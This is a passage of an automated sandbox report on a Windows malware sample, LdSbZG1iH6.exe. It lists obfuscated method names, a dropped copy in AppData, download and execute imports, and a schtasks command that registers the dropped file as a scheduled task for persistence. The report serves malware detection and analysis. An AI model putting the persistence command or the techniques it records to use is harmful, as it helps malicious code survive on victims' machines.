                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041C7F3 push eax; retf 8_2_0041C7FD
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00457AA8 push eax; ret 8_2_00457AC6
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00434EB6 push ecx; ret 8_2_00434EC9
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 10_2_06DD5E20 push edx; iretd 10_2_06DD5E21
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_10002806 push ecx; ret 14_2_10002819
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 14_2_10009FD8 push esi; ret 14_2_10009FD9
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044693D push ecx; ret 16_2_0044694D
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_00451D54 push eax; ret 16_2_00451D61
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0044B090 push eax; ret 17_2_0044B0A4
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_0044B090 push eax; ret 17_2_0044B0CC
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 17_2_00444E71 push ecx; ret 17_2_00444E81
                      Source: LdSbZG1iH6.exeStatic PE information: section name: .text entropy: 7.8714607770183616
                      Source: DGlxtFUfY.exe.0.drStatic PE information: section name: .text entropy: 7.8714607770183616
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, C3n7JsAJx6Dc9yBjh7.csHigh entropy of concatenated method names: 'p1olJ9EJZi', 'd2ilgDrBYq', 'eHSl18Ej12', 'qvclu8Pu6G', 'SH0lZiRmPP', 'X4Hln5stX6', 'ToilDkBTNs', 'zV2lWMNU3Z', 'UgClPtd4HR', 'woflbHChcU'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, L2165oTc18Ys7G5Drv.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ycj4pFlUjf', 'kVl4rC8RYv', 'OmT4zNBHJB', 'kJjxLayfC2', 'fH1xMsZ7P7', 'NwQx4M2pO9', 'SvhxxSLLrW', 'KLgw8dqXgKKBB7WWYaK'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, S0w2Yird1vtfqLM83v.csHigh entropy of concatenated method names: 'aqnUTY3rHE', 'pd6UOAFZji', 'RaCUwQYjP5', 'syBUlcXCYK', 'PO9UI0gR4d', 'GDPUkSxNSs', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, antjj6P923sx3geJla.csHigh entropy of concatenated method names: 'yipTuGPm4b', 'haYTnQShrV', 'rD0TWxjgc2', 'LpRTPuhJv0', 'G9cTRZdsbx', 'kTfTXKKEHy', 'UuMT883M5T', 'plOTS6TQEH', 'UNiTIJuw3i', 'ScuTUO77fN'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, U8d4cV4YvxH0uVSdZo.csHigh entropy of concatenated method names: 'EGg1ljkGC', 'xOYuCq2hs', 'Y8WncVS1d', 'ya6DjGhnC', 'decPORADb', 'Q2cbruQVo', 'juVEQnWFnwDJTEyeqR', 'ylNSukpZXHcPMQJ9lN', 'GRsSLxZmM', 'w0FUXTEDu'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, LvOBYdziOGRiOqldPC.csHigh entropy of concatenated method names: 'noWUnwPjE5', 'tJUUWwPKS5', 'lyyUPmWduP', 'IWKU3YEXvB', 'CwyUQinZUy', 'BX1UemkkLM', 'iBaUf4Puhq', 'TJgU0CSj3i', 'sIEUJl2MGV', 'eW8UgOlZoL'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, r0qZguMYmPcqKsKKY6Z.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lewjIgLXFG', 'eARjUNDbLi', 'S9fjqLRiPv', 'AwSjjC09MZ', 'lsjjHKcLIS', 'xbrjh7E5CU', 'V7Tj0gvnaR'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, SpGkNG2MTtcAExhwmk.csHigh entropy of concatenated method names: 'iHL8dC23t2', 'qyq8rZgheI', 'mGWSLyqFpA', 'QtBSMBD5ZV', 'fYr8CX6yee', 'xrb8GhxLAw', 'hr28yclrR8', 'mnR8vCMVnd', 'c7h8cNpP9a', 'XXo8oaWZiL'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, HP04oqMLHhf5oXodnML.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrDUCg3MRX', 'SUeUGNDPKq', 'IHHUye2ruC', 'iTyUv3O47u', 'GkvUc96R1d', 'WUyUo8aEvx', 'CAJUKRTO6M'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, GljOVrN5dspUP6abL2.csHigh entropy of concatenated method names: 'Dispose', 'EnfMphO5Ze', 'sGG4QfbaF4', 'cBqMvNu3dy', 'WpkMrEhRBo', 'ahXMzCyMNy', 'ProcessDialogKey', 'RX84L2XZOF', 'uOr4M9DJTl', 'yYm44c0w2Y'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, zF9cdEWZ6usHDRFDVF.csHigh entropy of concatenated method names: 'TwBNvxYGPD', 'Xc2NcQIgAR', 'nNANoDw8Zy', 'XLlNKXF592', 'P8cN5x7yHu', 'BPSN2IU2lx', 'c6ON6tH7RR', 'zDJNdAIhOK', 'FayNpFlxqP', 'jdYNrkbyQq'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, oHU4GjMMOmP83u0q7Jm.csHigh entropy of concatenated method names: 'bBjUrO20Lh', 'GTOUznXun8', 'VEWqLcI6lM', 'cNCqMTy7b5', 'wAOq41ObhC', 'YPEqxH567t', 'OCmqYSAZUs', 'zqmqayH2Cj', 'yGKqtOjq7Z', 'HC6qNiMYM9'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, p2XZOFpjOr9DJTlgYm.csHigh entropy of concatenated method names: 'vxgI3iFrn6', 'b4qIQdF7XC', 'r7gIVYIdhu', 'RSiIeg5q91', 'rbIIfmEdwq', 'wC0IEMxdN0', 'JitImT1L3f', 'hoVIBWBjke', 'YVvIAbCPdg', 'bhOI7QS6Ie'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, DAoa83mPFZpXtJWrO5.csHigh entropy of concatenated method names: 'BF2ltXEYAx', 'c5tlTP6vEo', 'GHclwf1HMu', 'V4Nwrv2Bqv', 'rjjwzHuQv4', 'bGOlL1LfMO', 'QmElM28MCy', 'MW5l4d6ja3', 'eu8lx76c9o', 'X8olY76jYm'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, cn19IQYSmV65AoC7Jp.csHigh entropy of concatenated method names: 'MB1MlF9cdE', 'B6uMksHDRF', 'W92Ms3sx3g', 'IJlMiaopR1', 'rwTMRA5SrF', 'hAiMXJVSkR', 'fKGSNmERkBAeWr0PwH', 'ubMtZxLgZ72ev7MF6m', 'b0CMMSonZV', 'X88MxQB2f4'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, dCsJjTy25rJ2rLEdGR.csHigh entropy of concatenated method names: 'P6wFWsY3O3', 'xYlFPkIhta', 'YksF37bSbh', 'yciFQ9S3b0', 'uccFeOImyk', 'YrTFfDvItY', 'xwnFm4WaD0', 'juMFBHXKsd', 'dHXF7DFhqe', 'mPPFCWDJu9'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, sj0FXjKA2xntr2LI2q.csHigh entropy of concatenated method names: 'B5A8s3maZU', 'AlD8i1C5LK', 'ToString', 'rLe8tx283t', 'K718Nbd5W3', 'XaP8TcQOjJ', 'KdH8OtOVxk', 'ERt8wDnZi7', 'Brg8lVitjC', 'f5f8k7McGq'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, CeGcCyQ4Uv4wWat4Nt.csHigh entropy of concatenated method names: 'NTRBmu7dQgpCnNlniII', 'PF3Jld79C12N2oKL9Da', 'dsrwS0Abth', 'k7mwIgYioR', 'sqFwUUg1s4', 'V75prb75EvKxoucCOhk', 'C5GVsV7Z1Op8EkUPLPB'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, rrFTAi3JVSkRSq1j8n.csHigh entropy of concatenated method names: 'KLbwa7KkSh', 'IfdwNOGomq', 'FpawOtJ8Zt', 'X9nwlmGsVx', 'pxfwkkXett', 'sSGO59e7SB', 'K6RO29G70d', 'gj8O6gOehE', 'T9YOdZr2tj', 'm3rOpgelwO'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.csHigh entropy of concatenated method names: 'kCOxaI4WO0', 'udqxt3wSme', 'D7qxNlci4K', 'bNIxTx5LO7', 'mH8xOkAQDo', 'VEgxw3mrCs', 'a6MxlqBAQV', 'Bgpxk1f1HZ', 'gNTx9CpewZ', 'RFExsec5cY'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, Lhu2Xr6HQPnfhO5Ze6.csHigh entropy of concatenated method names: 'odSIRG530M', 'BUeI8abEiT', 'IEuII6qyo2', 'x1qIqHcrtj', 'JlTIHwC1nv', 'zm7I031HT2', 'Dispose', 'PbtStwZMeJ', 'GIXSNkcwmA', 'IOpSTxsiU9'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, BtySsYvTRfLknWa3ML.csHigh entropy of concatenated method names: 'RPeR7yxRwf', 'eGGRG8u7dE', 't3wRvU8MTv', 'uZyRceRHAg', 'zAZRQWvdGU', 'G7GRV8iaec', 'Qw4Re6I2fp', 'KWkRfufABj', 'PPfREGvx8m', 'zrYRmBLJ8M'
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, oBSRqFMa3qnCnCr0vZa.csHigh entropy of concatenated method names: 'mwdGDghhPQqDI', 'FhVWVgXH0OkevnHNKA6', 'oF01rlXKLMHBQP8aybv', 'EVxua2XMdkPNqIEhcRl', 'RjopoHXg9btMdUC5ldF', 'aK2VukX1xXjsb4oZ4Lg'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, C3n7JsAJx6Dc9yBjh7.csHigh entropy of concatenated method names: 'p1olJ9EJZi', 'd2ilgDrBYq', 'eHSl18Ej12', 'qvclu8Pu6G', 'SH0lZiRmPP', 'X4Hln5stX6', 'ToilDkBTNs', 'zV2lWMNU3Z', 'UgClPtd4HR', 'woflbHChcU'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, L2165oTc18Ys7G5Drv.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ycj4pFlUjf', 'kVl4rC8RYv', 'OmT4zNBHJB', 'kJjxLayfC2', 'fH1xMsZ7P7', 'NwQx4M2pO9', 'SvhxxSLLrW', 'KLgw8dqXgKKBB7WWYaK'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, S0w2Yird1vtfqLM83v.csHigh entropy of concatenated method names: 'aqnUTY3rHE', 'pd6UOAFZji', 'RaCUwQYjP5', 'syBUlcXCYK', 'PO9UI0gR4d', 'GDPUkSxNSs', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, antjj6P923sx3geJla.csHigh entropy of concatenated method names: 'yipTuGPm4b', 'haYTnQShrV', 'rD0TWxjgc2', 'LpRTPuhJv0', 'G9cTRZdsbx', 'kTfTXKKEHy', 'UuMT883M5T', 'plOTS6TQEH', 'UNiTIJuw3i', 'ScuTUO77fN'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, U8d4cV4YvxH0uVSdZo.csHigh entropy of concatenated method names: 'EGg1ljkGC', 'xOYuCq2hs', 'Y8WncVS1d', 'ya6DjGhnC', 'decPORADb', 'Q2cbruQVo', 'juVEQnWFnwDJTEyeqR', 'ylNSukpZXHcPMQJ9lN', 'GRsSLxZmM', 'w0FUXTEDu'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, LvOBYdziOGRiOqldPC.csHigh entropy of concatenated method names: 'noWUnwPjE5', 'tJUUWwPKS5', 'lyyUPmWduP', 'IWKU3YEXvB', 'CwyUQinZUy', 'BX1UemkkLM', 'iBaUf4Puhq', 'TJgU0CSj3i', 'sIEUJl2MGV', 'eW8UgOlZoL'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, r0qZguMYmPcqKsKKY6Z.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lewjIgLXFG', 'eARjUNDbLi', 'S9fjqLRiPv', 'AwSjjC09MZ', 'lsjjHKcLIS', 'xbrjh7E5CU', 'V7Tj0gvnaR'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, SpGkNG2MTtcAExhwmk.csHigh entropy of concatenated method names: 'iHL8dC23t2', 'qyq8rZgheI', 'mGWSLyqFpA', 'QtBSMBD5ZV', 'fYr8CX6yee', 'xrb8GhxLAw', 'hr28yclrR8', 'mnR8vCMVnd', 'c7h8cNpP9a', 'XXo8oaWZiL'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, HP04oqMLHhf5oXodnML.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrDUCg3MRX', 'SUeUGNDPKq', 'IHHUye2ruC', 'iTyUv3O47u', 'GkvUc96R1d', 'WUyUo8aEvx', 'CAJUKRTO6M'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, GljOVrN5dspUP6abL2.csHigh entropy of concatenated method names: 'Dispose', 'EnfMphO5Ze', 'sGG4QfbaF4', 'cBqMvNu3dy', 'WpkMrEhRBo', 'ahXMzCyMNy', 'ProcessDialogKey', 'RX84L2XZOF', 'uOr4M9DJTl', 'yYm44c0w2Y'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, zF9cdEWZ6usHDRFDVF.csHigh entropy of concatenated method names: 'TwBNvxYGPD', 'Xc2NcQIgAR', 'nNANoDw8Zy', 'XLlNKXF592', 'P8cN5x7yHu', 'BPSN2IU2lx', 'c6ON6tH7RR', 'zDJNdAIhOK', 'FayNpFlxqP', 'jdYNrkbyQq'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, oHU4GjMMOmP83u0q7Jm.csHigh entropy of concatenated method names: 'bBjUrO20Lh', 'GTOUznXun8', 'VEWqLcI6lM', 'cNCqMTy7b5', 'wAOq41ObhC', 'YPEqxH567t', 'OCmqYSAZUs', 'zqmqayH2Cj', 'yGKqtOjq7Z', 'HC6qNiMYM9'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, p2XZOFpjOr9DJTlgYm.csHigh entropy of concatenated method names: 'vxgI3iFrn6', 'b4qIQdF7XC', 'r7gIVYIdhu', 'RSiIeg5q91', 'rbIIfmEdwq', 'wC0IEMxdN0', 'JitImT1L3f', 'hoVIBWBjke', 'YVvIAbCPdg', 'bhOI7QS6Ie'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, DAoa83mPFZpXtJWrO5.csHigh entropy of concatenated method names: 'BF2ltXEYAx', 'c5tlTP6vEo', 'GHclwf1HMu', 'V4Nwrv2Bqv', 'rjjwzHuQv4', 'bGOlL1LfMO', 'QmElM28MCy', 'MW5l4d6ja3', 'eu8lx76c9o', 'X8olY76jYm'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, cn19IQYSmV65AoC7Jp.csHigh entropy of concatenated method names: 'MB1MlF9cdE', 'B6uMksHDRF', 'W92Ms3sx3g', 'IJlMiaopR1', 'rwTMRA5SrF', 'hAiMXJVSkR', 'fKGSNmERkBAeWr0PwH', 'ubMtZxLgZ72ev7MF6m', 'b0CMMSonZV', 'X88MxQB2f4'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, dCsJjTy25rJ2rLEdGR.csHigh entropy of concatenated method names: 'P6wFWsY3O3', 'xYlFPkIhta', 'YksF37bSbh', 'yciFQ9S3b0', 'uccFeOImyk', 'YrTFfDvItY', 'xwnFm4WaD0', 'juMFBHXKsd', 'dHXF7DFhqe', 'mPPFCWDJu9'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, sj0FXjKA2xntr2LI2q.csHigh entropy of concatenated method names: 'B5A8s3maZU', 'AlD8i1C5LK', 'ToString', 'rLe8tx283t', 'K718Nbd5W3', 'XaP8TcQOjJ', 'KdH8OtOVxk', 'ERt8wDnZi7', 'Brg8lVitjC', 'f5f8k7McGq'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, CeGcCyQ4Uv4wWat4Nt.csHigh entropy of concatenated method names: 'NTRBmu7dQgpCnNlniII', 'PF3Jld79C12N2oKL9Da', 'dsrwS0Abth', 'k7mwIgYioR', 'sqFwUUg1s4', 'V75prb75EvKxoucCOhk', 'C5GVsV7Z1Op8EkUPLPB'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, rrFTAi3JVSkRSq1j8n.csHigh entropy of concatenated method names: 'KLbwa7KkSh', 'IfdwNOGomq', 'FpawOtJ8Zt', 'X9nwlmGsVx', 'pxfwkkXett', 'sSGO59e7SB', 'K6RO29G70d', 'gj8O6gOehE', 'T9YOdZr2tj', 'm3rOpgelwO'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, wXupdxkvZLWHsqKcjX.csHigh entropy of concatenated method names: 'kCOxaI4WO0', 'udqxt3wSme', 'D7qxNlci4K', 'bNIxTx5LO7', 'mH8xOkAQDo', 'VEgxw3mrCs', 'a6MxlqBAQV', 'Bgpxk1f1HZ', 'gNTx9CpewZ', 'RFExsec5cY'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, Lhu2Xr6HQPnfhO5Ze6.csHigh entropy of concatenated method names: 'odSIRG530M', 'BUeI8abEiT', 'IEuII6qyo2', 'x1qIqHcrtj', 'JlTIHwC1nv', 'zm7I031HT2', 'Dispose', 'PbtStwZMeJ', 'GIXSNkcwmA', 'IOpSTxsiU9'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, BtySsYvTRfLknWa3ML.csHigh entropy of concatenated method names: 'RPeR7yxRwf', 'eGGRG8u7dE', 't3wRvU8MTv', 'uZyRceRHAg', 'zAZRQWvdGU', 'G7GRV8iaec', 'Qw4Re6I2fp', 'KWkRfufABj', 'PPfREGvx8m', 'zrYRmBLJ8M'
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, oBSRqFMa3qnCnCr0vZa.csHigh entropy of concatenated method names: 'mwdGDghhPQqDI', 'FhVWVgXH0OkevnHNKA6', 'oF01rlXKLMHBQP8aybv', 'EVxua2XMdkPNqIEhcRl', 'RjopoHXg9btMdUC5ldF', 'aK2VukX1xXjsb4oZ4Lg'
                      Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_00406EEB ShellExecuteW,URLDownloadToFileW,8_2_00406EEB
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeFile created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
